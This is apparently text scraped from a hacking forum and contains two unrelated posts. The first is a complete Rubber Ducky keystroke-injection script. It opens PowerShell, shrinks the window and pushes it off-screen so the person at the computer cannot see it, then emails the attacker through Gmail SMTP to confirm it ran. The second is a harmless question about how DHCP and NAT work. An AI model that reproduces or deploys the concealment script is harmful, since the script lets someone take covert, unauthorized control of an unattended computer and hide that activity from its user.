Search the Community

I've been working on trying to create stealthy attacks with the Rubber Ducky. I've found a way to hide the powershell console while keeping focus (which is obviously needed for input from the Ducky). The basic idea is to move the console to the edge of the screen and then shrink the size of the console and it actually disappears. Here are the commands for the basic idea: REM Once powershell is up and running ALT SPACE STRING m LEFTARROW REPEAT 50 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER I found that shrinking the console size is faster than moving the console, so I played around with doing both several times to try and make the console disappear faster. To make sure the Ducky still had focus and was running, I had it send me an email. Here is my test script that uses this hiding technique: REM Author: desert33 REM Name: hidePS.txt REM Purpose: Try to Hide PowerShell for a more stealthy approach. REM Encoder V2.4 REM Using the run command for a broader OS base. REM *** Initial Delay *** DELAY 2000 REM *** Open powershell *** GUI r DELAY 250 STRING powershell ENTER DELAY 400 REM *** Hide PowerShell *** STRING [console]::WindowHeight=10 ENTER STRING [console]::WindowWidth=10 ENTER ALT SPACE STRING m LEFTARROW REPEAT 30 STRING [console]::WindowHeight=5 ENTER STRING [console]::WindowWidth=5 ENTER ALT SPACE STRING m LEFTARROW REPEAT 10 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER REM *** Send an email to prove Ducky is working *** STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'from@email.com' ENTER STRING $ReportEmail.To.Add('to@email.com') ENTER STRING $ReportEmail.Subject = 'Hello' ENTER STRING $ReportEmail.Body = '"You got Ducked. Better luck next time." -desert33' ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM *** Exit *** STRING EXIT ENTER

Could some of you IT wizards help me understand something about DHCP and NAT? I haven't studied these in the classroom, but I've done my share of reading and have certainly renewed DHCP and toggled NAT a few thousand times in the course of troubleshooting over the years. I was also just reviewing again the episode of hak5 where Darren + the cutie set up PPTP in BT5 and he shows how to disable DHCP for stealthiness. My limited understanding is basically that NAT allows my army of home computers to share a single external IP address by use of internal/local IP addresses and DHCP helps devices communicate with one another. So my question is "what happens when I disable one of both of these?" Empirically, I can see that I'm usually able to continue using the Internet as normal, on several devices at once. Does lack of NAT just slow down the process of identifying which of my babies (computers) a packet is meant for? Thanks